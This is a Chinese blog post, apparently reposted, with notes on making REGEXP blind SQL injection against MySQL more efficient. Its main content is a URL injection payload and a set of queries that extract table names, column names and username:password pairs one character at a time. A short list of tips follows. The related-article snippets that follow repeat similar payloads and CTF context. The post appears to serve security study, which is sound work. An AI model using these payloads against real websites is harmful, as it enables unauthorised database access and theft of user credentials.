regexp盲注的一些改进

最新推荐文章于 2023-10-09 20:47:32 发布
最新推荐文章于 2023-10-09 20:47:32 发布
阅读量192 收藏
点赞数
原文链接:http://www.cnblogs.com/junmoxiao/p/8506441.html
版权 
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

  这是之前看别人的文章写的exp,觉得有点啰嗦,其实可以很直白的写

select group_concat(table_name) from information_schema.tables where table_schema='security';
select((select group_concat(table_name) from information_schema.tables where table_schema='security') regexp binary '^e');
select group_concat(column_name) from information_schema.columns where table_name='users';
select((select group_concat(column_name) from information_schema.columns where table_name='users') regexp binary '^i');
select group_concat(username,':',password) from security.users;
select((select group_concat(username,':',password) from security.users) regexp binary '^D');

几个注意点

1 可以直接用group_concat全部匹配出来

2 mysql中用regexp是区分大小写的,只有对取md5的时候没关系,其他时候要加上binary,不过取数据时就不用group_concat了,用limit一条一条取

3 regexp也可以用二分法 '^[a-z]' 到 '^[a-h]'

转载于:https://www.cnblogs.com/junmoxiao/p/8506441.html

weixin_30477797
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
盲注之正则表达式攻击(REGEXP注入)
秋水的博客
09-03 3696
注入原理 什么是REGEXP注入? 首先说明一下,我并没发现这种注入是多么独特的一种方式。只是因为看到了,所以记下笔记,难受啊,越学看到的越多 REGEXP注入是一中注入方式,又叫盲注值正则表达式攻击 注入原理 应该场景就是盲注,原理就是直接查询自己需要的数据,然后通过正则表达式进行匹配,实用场景如下 and 1=(SELECT 1 FROM information_sche...
SQL正则盲注-regexp
cc菜的一批
12-26 1297
下面是题目源码 <?php include "config.php"; error_reporting(0); highlight_file(__FILE__); $check_list = "/into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|union|or|select|greatest|%00|...
CTF每日练习之“ezsql“-regexp注入
LCW991207的博客
08-27 388
CTF每日练习(8月29日) "ezsql"-regexp注入
REGEXP注入与LIKE注入学习笔记
qwzf
08-08 3433
首发于先知社区 0x00 前言 之前已经学过SQL盲注了,也见过盲注REGEXP注入,但没详细了解过。正好这次BJD遇到了这个,简单总结,并把题目复现一下。 0x01 注入原理 REGEXP注入,即regexp正则表达式注入。REGEXP注入,又叫盲注值正则表达式攻击。 应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。 0x02 REGEXP注入分析 1、基本注入 select (s...
[NCTF2019]SQLi:regexp正则注入
soldi_er的博客
05-18 7806
文章目录参考   登陆框。 给出后台查询语句sqlquery : select * from users where username='' and passwd=''。   信息搜集:手测黑名单 闭合黑名单:' 可用闭合:? 逻辑运算符黑名单:Or、And、Xor 可用逻辑运算符:||、&&、^。 注释符黑名单:#、--+、单引号闭合 可用注释符:;%00 空格黑名单:space、+ 可用替换符:/**/、%09等 关键词黑名单:Union 用户名黑名单:Adm
JavaScript RegExp - 快速指南
最新发布
04-23
JavaScript RegExp - 快速指南
RegExp 随笔 JavaScript RegExp 对象
10-21
主要介绍了RegExp 随笔 JavaScript RegExp 对象,需要的朋友可以参考下
regexp-1.3.jar
04-16
regexp-1.3.jar 是RegExp 对象表示正则表达式,它是对字符串执行模式匹配的强大工具所使用jar,已经测验过,欢迎下载!
JavaScript replace new RegExp使用介绍
10-22
主要介绍了JavaScript replace new RegExp使用介绍,需要的朋友可以参考下
RegExp对象的方法和属性
10-30
RegExp对先看整个字符串是不是匹配,如果没有发现匹配,先去掉最后字符串中的最后一个字符,并再次尝试,如果还没有发现匹配,那么再次去掉最后一个字符,这个过程会一直重复下去直到发现匹配或不剩任何字符串,上面...
正则表达式注入(REGEXP注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-14 1551
应该场景就是盲注,原理就是直接查询自己需要的数据,然后通过正则表达式进行匹配,实用场景如下 MySQL Payload and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e' LIMIT 0,1) ‘^e[a-z]’ -> ‘^em[a-z]’ -> ‘^ema[a-z]’ -> ‘^emai[a-z]’-> ‘^email[
[NCTF2019]SQLi regexp 盲注
m0_64180167的博客
10-09 6656
这里我们可以发现没有过滤 \ 所以username 我们可以通过 \ 来绕过。这里很坑 上面的 字符*的时候会循环输出。所以还是要通过 查询admin passwd 进入。所以我们可以通过 布尔注入实现这道题的读取。写注入的代码 这里很多都被过滤了。发现进行302跳转 但是没办法。但是放出了 ^和 regexp。所以我们通过passwd注入。然后空格使用 /**/代替。不知道是环境问题还是什么。说需要admin的密码。or 使用 || 代替。我们可以通过正则来读取。
[NCTF2019]SQLi——regexp注入
qi_SJQ_的博客
11-15 3051
打开题目,很明显的sql注入,甚至连sql注入语句是字符型都贴了出来,写的那么明目张胆,很显然waf过滤的很多,很变态: 嗯,fuzzing一下,果然基本会的都过滤了(doge),抱着试试的心态扫了下目录,发现robots.txt提示有hint.txt: 不会…,看看wp1和wp2 ...
mysql注入之盲注语句汇总
sirius的博客
08-28 3616
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
[NCTF2019]SQLi(Regexp注入)
D.MIND 的博客
04-25 694
文章目录分析Regexp注入盲注脚本总结: 又是一道考验写python脚本的题目,python学的真不咋地,看师傅们的脚本才知道一些点改怎么写… 分析 查询语句: sqlquery : select * from users where username='' and passwd='' 一开始真的尝试很多感觉不好绕,后来意识到前面username处可以用反斜杠将SQL语句的单引号转义,再之后就没头绪了,因为实在过滤了很多,之后尝试了看看有没有hint信息,在robots.txt处找到,提示看hint.
[转载]sql 盲注之正则表达式攻击
weixin_34396902的博客
07-29 234
-----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli...
CTF中几种通用的sql盲注手法和注入的一些tips
xuchen16的博客
10-09 2552
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的...
CTF从入门到提升(三)基于时间的盲注及部分函数
anquanniu的博客
08-20 1786
本次内容会先介绍一些函数,然后结合一些题目进行讲解。这里的基于时间是指延时。 ​​我们对于盲注最早接触的应该就是SLEEP函数, 很多编程语言中都有它。函数的特点就是添加延时功能,我们可以看一下它的一个效果是什么样子的。 (在这里我做一个演示,如果大家想看可以到安全牛课堂的视频里看动手操作 CTF从入门到提升 课时3:1分10秒) 举栗子: 在添加了SLEEP函数之后,它的运行结果要是...
SQL注入-盲注(布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值